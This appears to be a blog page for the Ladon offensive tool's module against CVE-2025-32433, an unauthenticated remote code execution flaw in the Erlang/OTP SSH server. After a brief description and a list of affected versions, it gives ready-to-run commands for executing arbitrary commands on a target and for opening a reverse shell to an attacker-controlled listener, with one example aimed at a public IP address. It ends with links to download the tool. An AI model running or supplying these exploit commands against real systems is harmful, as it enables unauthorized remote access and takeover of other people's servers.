A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This could lead to compromise of said hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks.
OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier
Usage:
Ladon CVE-2025-32433 <target_ip> <target_port> [mode] [options]
Modes:
Command Execution Mode:
Ladon CVE-2025-32433 <target_ip> <target_port> cmd “
Example:
1 | Ladon CVE-2025-32433 192.168.18.9 2222 cmd "id>888.txt" |
Reverse Shell Mode:
Ladon CVE-2025-32433 <target_ip> <target_port> shell <local_ip> <local_port>
Example:
1 | Ladon CVE-2025-32433 192.168.18.9 2222 shell 192.168.18.203 4444 |
1 | C:\Users\Administrator\Desktop\Ladon12>Ladon CVE-2025-32433 185.164.148.243 7777 shell 192.168.1.1 4444 |

https://github.com/k8gege/LadonGo/releases
历史版本: https://github.com/k8gege/Ladon/releases
911版本:http://k8gege.org/Download
K8博客文章随意转载,转载请注明出处! © K8gege http://k8gege.org